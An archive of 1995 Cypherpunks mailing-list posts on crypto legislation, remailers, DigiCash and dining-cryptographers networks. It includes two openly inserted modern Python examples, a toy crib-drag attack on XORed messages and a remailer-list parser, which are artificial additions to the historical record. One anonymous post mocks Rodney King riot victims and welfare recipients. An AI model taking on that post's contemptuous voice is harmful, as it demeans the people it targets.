   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 16 Jul 95 19:55:38 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: RICO and Asset Forfeitures
In-Reply-To: <ac2e8d33170210048e56@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950716225303.13023C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 16 Jul 1995, Timothy C. May wrote:

> At 12:59 PM 7/16/95, Andrew Spring wrote:
> >>ranked as a mobster subject to RICO.  My guess is that the intent is that
> >>from one placement on an FTP server or one posting to a newsgroup, the
> >>perpetrator of that heinous act will have passed his RICO qualification and
> >>therefore be subject to having all he owns taken from him.
> >
> >RICO question:  I thought that the idea of RICO is to confiscate assets of
> >racketeers that are derived from criminal activities.  PGP and remailer
> >software is distributed free.  so would RICO seizures even apply (yes I
> >know this doesn't always stop the FBI)?
> 
> As I understand RICO (Racketeer-Influenced and Corrupt Organizations Act,
> though the euphonious "Rico," a la South American drug kingpins, is the
> real reason for the name), only the assets imputed to the illegal act can
> be seized. Thus, boats, factories, houses, etc., that are imputed
> (believed, claimed) to have been bought partially or wholly from funds from
> illegal acts can be seized.
>
Assets directly traceable to criminal activity can be forfeited in a 
civil proceeding.  "Substitute assets" (when the assets obtained 
directly from the criminal activity have been dissipated or just can't be 
found) can be forfeited in a criminal forfeiture (that is, as part of an 
indictment...).
 
> Civil penalties are another matter. If you're charged with distributing
> something illegal and a fine of $250,000 is levied, then you may have to
> sell everything you own to pay it, but it's not a RICO seizure.
> 
> --Tim May
> 
EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 16 Jul 95 23:25:43 PDT
To: mix-l@jpunix.com
Subject: Mixmaster@obscura.com back with new keys.
Message-ID: <199507170624.XAA12232@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Mixmaster@obscura.com is back. Obscura crashed last weekend, taking all
data with it. The remailer is running again but the secret keys were
lost.

This remailer is running Mixmaster 2.0.1 and the latest Ghio type1 remailer
for cypherpunk messages.

Here is the mixmaster key:

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1


and here is the pgp key:



   -Lance

-- 
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:29:41 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507170827.BAA12413@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:59 PM 7/16/95 +0100, Andrew Spring wrote:
>RICO question:  I thought that the idea of RICO is to confiscate assets of
>racketeers that are derived from criminal activities.  PGP and remailer
>software is distributed free.  so would RICO seizures even apply (yes I
>know this doesn't always stop the FBI)?

You _were_ using that software on a _computer_ weren't you?  Guess it's 
one of your racketeer's tools, so we'll have to take it for ourselves, er, um,
for evidence and protection of national security....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:29:13 PDT
To: Phil Fraering        <cypherpunks@toad.com
Subject: Re: Mods to Dining Cryptographers: legal questions...
Message-ID: <199507170827.BAA12420@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 7/15/95 -0500, Phil Fraering wrote:
>I'm sorry if I was a little mysterious about my reference to
>another use or mode of a DC-net; I'd _love_ to tell the rest of
>you flat-out, and put the idea in the public domain, but I'm
>not sure I _CAN_.
.....
>Are there any patents on Dining-Cryptographers networks that could
>interfere with the placing in the public domain, or the patenting, of
>an improvement to the network system?

Case 1 - you want to be able to patent your stuff yourself.  Case 2 - you don't.
For Case 1, I can't help you much, but US patent law lets you apply for a
patent on something within one year of publication (most other countries don't
allow that - if you publish before applying, you don't get to patent it.)
So publish.  For Case 2, publish.  You could get fancy and use surety.com's
date-stamping service to keep a copy of what and when you published.

If the material you've developed was already invented, and patented, 
by someone else, it's still ok to publish it, you just can't use the stuff
(except for research, etc.)  (I've been burned by this one; I _thought_ my
idea seemed obvious enough that somebody else should have already thought of
it first :-)  So if you're trying to put something in the public domain,
you may want to put a footnote in it saying that you're not making any
claims about other people's previous patent applications, etc.

So, anyway, what's your new idea?
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:29:17 PDT
To: cypherpunks@toad.com
Subject: Re: Deployment
Message-ID: <199507170827.BAA12427@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> > So, anyone want to volunteer to port Privtool to Windows ?
> Uh, pardon my ignorance, but what is privtool, and why is it
> a good thing to port it to windows?
> (As compared to the task of integrating PGP into microsofts
> mail tool.)

It's an open-system mail tool resembling Sun's mailtool with PGP support added.
Open-system tools are one of those vanguard things :-)  
(So are convenient GUI-development tools.)
I no longer have a nearby Sun machine to play on, so I haven't played with it,
but if it's got a well-done interface it's worth porting or stealing concepts
from to include in other systems.  I've heard that Microsoft's new mail tools
are far less brain-damaged than the Microsoft Mail I've grown to know and hate,
which assumes any message that's more than a few lines will be an attached
document with maybe some optional intro and leftover mail headers,
and chokes on messages with more than 30K of text in the body (choking badly
on more than 64K).  (Apparently, part of the reason for this evil is the fault
of Visual Basic and/or Visual C++, which are convenient GUI development
tools...)

On the other hand, integrating it into Free Eudora for Windows would be
pleasant, if that's doable (I forget if source is available.) 
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 01:30:35 PDT
To: cypherpunks@toad.com
Subject: Re: A Chronology on crypto bans
Message-ID: <199507170827.BAA12430@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 PM 7/16/95 -0400, Dave Banisar wrote:
>Someone asked why is there such a flurry recently on banning crypto in
>recent months. This is not a recent issue. There have been almost non-stop
>attempts for the last 15 years.

True, though there have been more and louder calls for banning crypto as
it becomes more widely used, and as the Internet and electronic commerce
make its use more relevant.  The number of cats running around outside of bags
has been increasing, so the effort of the politicians to herd them back in
has become more and more noticeable.  

A lot of it has been good public relations by the Good Guys as well -
back in the late 70s, when I started following it, crypto was mostly for spooks,
bankers, and academic math nerds*; PGP and the government's persecution of Phil
have made a lot of people aware that the stakes are high and the Bad Guys
are serious, and the Clipper Chip sounded enough like "The Feds want to tap
my phone" that the general public could understand, a bit, that this was
something that affected them...

It's also been technology - real crypto needs computers, and computers have
gone from million-dollar room-fillers that you might use at work or university
to appliances you can buy at WalMart, like tv sets, which your kids use for
school, if you don't count game machines, which your kids can buy at K-mart...
Suddenly a third of the country's got a machine they can do real crypto on,
and for 10 bucks a month they can be on a world-wide email network.
And it's mostly the _rich_ third of the country, who might want to do their
home banking somewhere a bit less taxing than before.

Oh, yeah, there's also drugs - folks might want to use the Home Shopping
Internet for more than just fake jewelry :-)

* at the time, I was an academic math nerd designing banking networks
at the phone company, and my department also did studies for spooks...
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 17 Jul 95 00:39:07 PDT
To: ecm@ai.mit.edu
Subject: Re: ECM list.
In-Reply-To: <9507170051.AA06498@grape-nuts>
Message-ID: <199507170738.BAA25016@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

>  For example, you might be holding $85.73 in digicash (having played the 
> various slot machine pages, maybe bought a sky photograph from the Bradford
> telescope).


That's just about right.


>  What would it take for you to buy more digicash?  How about to sell it?


Right now I am thinking of e$ as a "collectors item" or a fun thing to
brag about in some distant year.  I'm offering US$1.00 for e$15.00, but
I will quit offering that price once I run out of US$ or decide that I
have enough e$!


I think that the ecm market is probably composed of very few people who
mostly want to buy, and is therefore not a high-volume market!  If the ecm
market got a link from the DigiCash home page (which I'm sure it could do)
then you would probably get lots of people who just got their free e$100.00
and who are willing to sell part of it after having experienced the wonders
of the slot machines and the "e$0.01-per-move tic-tac-toe" games.
  Could we set up a WWW version of the ecm market, listing latest offers
to anyone with a WWW browser?  Things might really pick up-- at least for
us buyers!


I'm also considering other strategies for gaining e$--  offering a service
on the DigiCash "cybershops" page, or just going to all my e-mail using
friends, showing them how to get their free e$100.00, and then begging them
to give me half of it.  (Finder's fee?  Friendly gift?)


Possibly I shouldn't have posted the above and given my e$-collecting
competitors the idea, because eventually DigiCash is going to quit giving
out freebies!  Hopefully my friends will get on the ball and acquire their
freebies before that point!  :-)   [mental note to add some of said friends
to the Cc: line...]


Bryce
P.S.  Oh great.  My "friends" are asking for the $1.00 for e$15.00 deal...


signatures follow

 /=============------------
  Bryce Wilcox, Programmer               [THIS SPACE FOR RENT]
  bryce.wilcox@colorado.edu
  ------------=============/    E-mail is between you and me-- use PGP!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMAoTRZCUT4gUihHlAQEBMgQAueueOvkxSsVRBS20k49zUhOr8wa/CKcD
vqsKLhHoeWhrXuYMKV5KTGgQ86TLwiu5n1C0fjomcJ+86UT1Py09i+yfeBj956hH
sMFoGHgu4jKtQPZ94FsmsCzfDXPF6htnuOnQYjSrAydckomZoiQfPICDFRGeiSTp
FbXeDMRMrMs=
=1z8A
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Sun, 16 Jul 95 17:16:33 PDT
To: cypherpunks@toad.com
Subject: Re: The Recent Flurry of Anit-Crypto Activity... Why?
In-Reply-To: <3u6oj5$fir@nntp.crl.com>
Message-ID: <199507170016.CAA19393@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


from 'Buzz White': 
> 
> More to the point, the question  "Why Now?" comes to my mind.
> 
> So, I posit that this legislative swirl is an attempt to squash true "crypto
> for the masses" (via real commercial integration) before it gets out "into
> the world". 
> 
> Anybody have a better analysis of the "Why Now" part of the question?
 
Good theory, but I think the major reason is more obvious. We have 
elected "representatives", led by a complete slimeball president, that
want to usurp every bit of liberty we have. Money, soul, healthcare,
private property, you name it. The sooner they can grab it, the more
completely they can control us. Crypto, digicash, and remailers work
against their attempts, so they try to stop them. The more they want
something from us, the stronger our effort must be not to let them have
it. They think we need their "help" to live our lives, and that without 
it we would be helpless. They think we're all like those pathetic people in 
LA who had no clue what to do with their welfare checks when check cashing
stores were torched during the Rod-knee King Bar-B-Q and Block Party. The
sad part is that as more and more people are absorbed into the welfare
state, fewer remain to assert our right to personal liberty and our
right "to be left alone". We're likely to lose by attrition.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 18 Jul 95 15:11:35 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <199507170016.TAA23019@arnet.arn.net>
Message-ID: <9507170819.AA16469@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



>  Especially if the form letter generated would be randomly selected
>from parallel word streams.  For example:
[...]
>  You get the idea.

Rather than spend five minutes writing something on your own you'd end
up with something that looks totally fake.  I believe that what is going on
would be discerned by a staffer in moments. Crap like this is called
"astroturf" by staffers, to distinguish it from "grass roots" efforts.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Tue, 18 Jul 95 18:20:36 PDT
To: stewarts@ix.netcom.com
Subject: Here it is; bi-directional dining cryptographers
In-Reply-To: <199507170827.BAA12420@ix6.ix.netcom.com>
Message-ID: <199507171153.AA11135@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill, I'll probably go down to the notary's this morning to get the
thing registered; I don't want to pay $ 50.00 to surety for what's
likely to be a one-shot deal.

And I've been leaning towards the side of releasing it into the public
domain anyway, so here goes:

(And besides, I can't believe everyone else missed this; one of you
has got to know about this already):

If Alice and Bob are members of a reasonably non-compromised and
free of colluders dining-cryptographers network, with a protocol for
reserving blocks for the transmission of data packets, then if they
both send a data packet in the same block, they can each read what
the other is saying but to the rest of the DC-net it is garbled.

Since what is broadcast is the XOR of Alice's and Bob's data, Alice can
read Bob's data by XOR'ing the output of the DC-net with her attempted
input; Bob can recover her data the same way.

Comments?

(At the very least, it doubles the bandwidth for the two participants...)

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew Roos" <ANDREWR@real3.realtime.co.za>
Date: Tue, 18 Jul 95 18:39:57 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: Here it is; bi-directional dining cryptographers
Message-ID: <C189311569@real3.realtime.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering  <pgf@tyrell.net> observes:

> If Alice and Bob are members of a reasonably non-compromised and
> free of colluders dining-cryptographers network, with a protocol for
> reserving blocks for the transmission of data packets, then if they
> both send a data packet in the same block, they can each read what
> the other is saying but to the rest of the DC-net it is garbled.
> 
> Since what is broadcast is the XOR of Alice's and Bob's data, Alice can
> read Bob's data by XOR'ing the output of the DC-net with her attempted
> input; Bob can recover her data the same way.
>
> Comments?

I haven't been following the DC thread so forgive me if I've missed 
something... 

If the objective is to keep what Alice and Bob say SECRET then we 
have a problem if the entropy per bit of Alice's data plus the 
entropy per bit of Bob's data is less than one bit, because then 
there is only one likely decryption of the "ciphertext", which will 
reveal what both Alice and Bob are saying.

The system is analogous to a variation on the old Vigenere/Beaufort 
cipher where instead of using a single repeated keyword to generate 
the encryption stream, you use another "plaintext" message such as a 
passage from a book which is known to both correspondents. (Here the 
addition is done mod 26 instead of mod 2).

Since the entropy of natural language is 1-1.5 bits/char, the entropy of two 
natural language texts added together is 2-3 bits per char, while the 
no of ciphertext bits is about 5 bits per char, so there remains 2-3 
bits per char of redundancy in the text, which can (quite easily) be 
used to break the system even on a ciphertext-only basis.

One way to do this is to search for "probable words" of one side of 
the conversation, then see what the other text would have to have 
been to generate the known ciphertext, and if this other text makes 
sense then bingo, we have an initial break, and you can usually 
extend this quite easily by extending one text, then seeing what this 
gives for the other, extending that, and so on.

> (At the very least, it doubles the bandwidth for the two participants...)
I have to agree here, though!

Andrew
___________________________________________________________________________

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)

Andrew Roos                                                 Realtime
                                                            PO Box 15170
                                                            Vlaeburg 8018
Phone: +27-21-244350                                        Cape Town
Fax:   +27-21-221507                                        South Africa
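
The exchange Phil describes and the probable-word test Andrew outlines, as an added example that is not code from either post: a four-member DC-net block in which two members transmit at once, followed by an observer sliding one guessed phrase across the broadcast. The member names Carol and Dave, the block size, both messages, the word list and the plausibility test are constructed for illustration.

```python
"""DC-net block with two simultaneous senders, then a probable-word check."""
import secrets
from itertools import combinations

BLOCK = 32  # bytes per reserved block (assumed size)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def dc_round(inputs: dict) -> bytes:
    """Run one block. Every pair of members shares a fresh random pad; each
    member announces its input XORed with all of its pads. Each pad appears
    in exactly two announcements, so the pads cancel in the broadcast."""
    names = sorted(inputs)
    pads = {pair: secrets.token_bytes(BLOCK) for pair in combinations(names, 2)}
    broadcast = bytes(BLOCK)
    for name in names:
        announcement = inputs[name]
        for pair, pad in pads.items():
            if name in pair:
                announcement = xor(announcement, pad)
        broadcast = xor(broadcast, announcement)
    return broadcast


# Constructed sample traffic: Alice and Bob both use the same reserved block,
# Carol and Dave stay silent (all-zero input).
ALICE = b"meet me at the remailer at noon".ljust(BLOCK)
BOB = b"the key is posted on the list".ljust(BLOCK)
SILENT = bytes(BLOCK)


def run_block() -> bytes:
    return dc_round({"alice": ALICE, "bob": BOB, "carol": SILENT, "dave": SILENT})


# Observer side. Crude stand-in for "does the other text make sense":
# only lowercase letters and spaces, and every word fully enclosed by
# spaces must be in a small constructed vocabulary.
ALLOWED = set(b"abcdefghijklmnopqrstuvwxyz ")
WORDS = {b"on", b"the", b"is", b"at", b"to", b"key", b"list", b"posted"}


def looks_like_text(fragment: bytes) -> bool:
    if any(c not in ALLOWED for c in fragment):
        return False
    interior = fragment.split(b" ")[1:-1]  # edge tokens may be cut mid-word
    return bool(interior) and all(word in WORDS for word in interior)


def crib_drag(broadcast: bytes, crib: bytes) -> list:
    """Slide a guessed phrase over the broadcast. Where the guess matches one
    sender's text, XORing it out leaves the other sender's text."""
    hits = []
    for offset in range(len(broadcast) - len(crib) + 1):
        other = xor(broadcast[offset:offset + len(crib)], crib)
        if looks_like_text(other):
            hits.append((offset, other))
    return hits


if __name__ == "__main__":
    out = run_block()
    # Each sender removes its own input to read the other's packet.
    print("Alice reads:", xor(out, ALICE))
    print("Bob reads:  ", xor(out, BOB))
    # A member who sent nothing sees only the XOR of two natural-language
    # texts, and a single probable word is enough to test alignments.
    for offset, fragment in crib_drag(out, b" remailer "):
        print("offset", offset, "->", fragment)
```

Other offsets may also pass this crude filter; the extension step Andrew describes, growing one text and checking the other, is what separates the real alignment from chance matches.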




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 17 Jul 95 06:50:38 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199507171350.GAA13217@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 17 Jul 95 6:00:03 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       *+*+****+***    14:18  99.99%
rmadillo remailer@armadillo.com           +++++++++++*    49:27  99.99%
spook    remailer@spook.alias.net         ********--**  1:32:17  99.99%
flame    remailer@flame.alias.net         ++++++++-+++    57:13  99.99%
syrinx   syrinx@c2.org                    -------+---   1:44:52  99.99%
replay   remailer@replay.com              *+*+**+*+***    13:59  99.95%
vox      remail@vox.xs4all.nl             -..--.-.---- 12:41:56  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           .**+*#*###*-    54:07  99.90%
crown    mixmaster@kether.alias.net        --------+-   1:12:09  99.89%
portal   hfinney@shell.portal.com         *****#*#####     2:18  99.82%
alumni   hal@alumni.caltech.edu           *****#*#*#*#     3:02  99.82%
vishnu   mixmaster@vishnu.alias.net       -**+** ++***    20:02  98.62%
gondolin mixmaster@gondolin.org           -**-**++*---  1:17:43  98.56%
c2       remail@c2.org                     -*++++++-++    42:52  98.03%
extropia remail@extropia.wimsey.com       -..--.-_ --  14:50:37  97.80%
ideath   remailer@ideath.goldenbear.com   _ --......   17:04:28  96.35%
ford     remailer@bi-node.zerberus.de            #-#+#  1:52:55  96.09%
hroller  hroller@c2.org                   ++***# +*-++    12:53  94.98%
penet    anon@anon.penet.fi               --+++-- --++  2:59:39  92.16%
rebma    remailer@rebma.mn.org            -_++_.-+--+  15:25:46  91.39%
rahul    homer@rahul.net                  *++*+++*##+-    10:33  99.94%
tower    remailer@tower.techwood.org                       6:44   1.46%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
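
An added example (not part of Raph Levien's post or of premail): a parser for the two formats used in the list above, the `$remailer{...}` capability lines and the ping table, followed by a chain-candidate filter. The sample rows are copied from the list; the selection policy (require cpunk and pgp, skip mon/filter, 95% minimum uptime) and all function names are assumptions made for the illustration.

```python
import re

# Sample rows copied from the list above (a subset, embedded so this runs offline).
CAPS = '''
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp post";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
'''
PINGS = '''
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       *+*+****+***    14:18  99.99%
flame    remailer@flame.alias.net         ++++++++-+++    57:13  99.99%
vishnu   mixmaster@vishnu.alias.net       -**+** ++***    20:02  98.62%
penet    anon@anon.penet.fi               --+++-- --++  2:59:39  92.16%
rahul    homer@rahul.net                  *++*+++*##+-    10:33  99.94%
tower    remailer@tower.techwood.org                       6:44   1.46%
'''

CAP_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";\s*$')

def parse_caps(text):
    """Parse $remailer{"name"} = "<address> flag flag ..."; lines."""
    out = {}
    for line in text.splitlines():
        m = CAP_RE.match(line.strip())
        if not m:
            continue
        name, addr, flags = m.group(1), m.group(2), m.group(3).split()
        # Per the key: "pgp." (with a period) means the short name, not the
        # full address, is the PGP key ID to encrypt to.
        key_id = name if "pgp." in flags else addr if "pgp" in flags else None
        out[name] = {"address": addr,
                     "flags": {f.rstrip(".") for f in flags},
                     "key_id": key_id}
    return out

def latency_seconds(text):
    """Convert 'm:ss' or 'h:mm:ss' from the latency column to seconds."""
    secs = 0
    for part in text.split(":"):
        secs = secs * 60 + int(part)
    return secs

def parse_pings(text):
    """Parse ping-table rows. The history column may contain spaces or be
    empty, so latency and uptime are taken from the right-hand end."""
    out = {}
    for line in text.splitlines():
        tok = line.split()
        if len(tok) < 4 or "@" not in tok[1] or not tok[-1].endswith("%"):
            continue  # header, rule line, or blank
        out[tok[0]] = {"latency": latency_seconds(tok[-2]),
                       "uptime": float(tok[-1].rstrip("%"))}
    return out

def candidates(caps, pings, need=("cpunk", "pgp"), avoid=("mon", "filter"),
               min_uptime=95.0):
    """Names that have every needed flag, none of the avoided ones, and
    enough uptime, fastest first. The policy itself is an assumption."""
    picked = []
    for name, info in caps.items():
        ping = pings.get(name)
        if ping is None or ping["uptime"] < min_uptime:
            continue
        if not set(need) <= info["flags"] or set(avoid) & info["flags"]:
            continue
        picked.append((ping["latency"], name))
    return [name for _, name in sorted(picked)]

if __name__ == "__main__":
    caps, pings = parse_caps(CAPS), parse_pings(PINGS)
    for name in candidates(caps, pings):
        print(name, caps[name]["key_id"], pings[name])
```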




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 18 Jul 95 18:55:53 PDT
To: Andrew Roos <ANDREWR@real3.realtime.co.za>
Subject: Re: Here it is; bi-directional dining cryptographers
Message-ID: <Pine.3.89.9507171327.A3308-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 17 Jul 1995, Andrew Roos wrote:

> If the objective is to keep what Alice and Bob say SECRET then we
> have a problem if the entropy per bit of Alice's data plus the
> entropy per bit of Bob's data is less than one bit, because then
> there is only one likely decryption of the "ciphertext", which will
> reveal what both Alice and Bob are saying.

Yes, but presumably it's expected that they would be using secure
encryption on the messages that they're sending. That might still provide
some information about the message for traffic analysis, e.g. if you send
a PGP message you have your key-id at the beginning, and if you knew the 
keys of all members of the DC-net you could XOR them and see who's 
talking to who.
 
I'd have thought the most significant problem would be reserving the
blocks in an anonymous fashion while not allowing denial-of-service
attacks. 

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 17 Jul 95 03:58:13 PDT
To: cypherpunks@toad.com
Subject: NSA and NatSec Looks
Message-ID: <199507171058.GAA07387@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a pretty good recent overview of NSA -- history, 
organization, operations and, best, facilities -- at:


     URL: http://www.fas.org/pub/gen/fas/irp/nsa/


This is part of the Federation of American Scientists (FAS) web 
site, cited here by Jim Gillogly in connection with the VENONA 
papers.


There are links to a bounty of other information on national 
security and governmental secrecy.


Among many sweetmeats, the homepage on "Cyberstrategy" may be 
of interest (John Pike's project):


     URL: http://www.fas.org/pub/gen/iswg/cyberstr.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
